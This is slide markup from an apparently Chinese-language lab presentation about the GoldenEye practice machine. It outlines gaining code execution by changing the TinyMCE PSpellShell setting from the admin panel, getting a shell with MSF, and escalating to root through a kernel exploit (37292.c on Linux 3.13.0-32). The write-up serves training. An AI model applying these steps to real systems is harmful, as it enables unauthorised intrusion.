                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>失败原因：对方需要修改执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>PSpellShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487794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36F2FFD-86E8-4831-9BF6-52EA3D1EAC0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="541020" y="530274"/>
            <a:ext cx="11109960" cy="6134100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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漏洞利用：修改执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>PSpellShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B374F-C447-4ACF-8272-2C7746497BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985420" y="4067138"/>
            <a:ext cx="4891686" cy="1859740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>根据攻击脚本中的设置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>进入网页管理员界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TinyMCE HTML editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>PSpellshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155317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漏洞利用：远程代码执行利用漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5B7220-4527-4219-B211-AC6FA77AF9F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940788" y="5449186"/>
            <a:ext cx="6310422" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用漏洞获得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shell,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>并使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tty</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{985FAE15-1B45-44FF-8229-24D180D0159C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="50150" r="444"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1729013" y="1469714"/>
            <a:ext cx="8733971" cy="3444949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2209189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800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GoldenEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶场</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F4B0ED2-A421-4F33-9E15-672AB7A2D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778" y="1116656"/>
            <a:ext cx="8168444" cy="461759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CD376FC-4400-4118-829C-C96430757A3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3166508" y="5741344"/>
            <a:ext cx="5858984" cy="735971"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目标：获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GoldenEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>靶机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3424806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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>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13110" y="3510280"/>
            <a:ext cx="2101020" cy="2015089"/>
            <a:chOff x="1048224" y="3047028"/>
            <a:chExt cx="2862843" cy="2991505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 1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2" name="矩形 1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13" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图形 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
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879055" y="3749229"/>
            <a:ext cx="1569127" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD9F68"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498645" y="4472151"/>
            <a:ext cx="5411787" cy="677814"/>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sz="4800" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内核提权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229400896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内核提权：查看靶机版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA5B7220-4527-4219-B211-AC6FA77AF9F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674074" y="3346749"/>
            <a:ext cx="3853417" cy="223708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fr-FR" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>uname -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查看当前机器信息</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742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Linux ubuntu 3.13.0-32</a:t>
            </a:r>
          </a:p>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查找可以使用的提权漏洞</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742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>37292.c</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="uu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8719E08-F293-40D4-A95A-233C8915450B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="674074" y="1231471"/>
            <a:ext cx="7232360" cy="1602105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78B2FC7-5EDF-4703-8339-CA1AA8D6FCD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4607864" y="2728958"/>
            <a:ext cx="7342651" cy="3814711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2031110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内核提权：查看漏洞信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DB5177-945E-4B75-8936-434159A73DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1535784" y="1116656"/>
            <a:ext cx="9120431" cy="5360773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1876353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内核提权：查看漏洞信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACBB61A5-E021-420A-9063-9DFC8EC6BC2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252492" y="984210"/>
            <a:ext cx="9687016" cy="5547718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625857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内核提权：下载并修改漏洞脚本文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
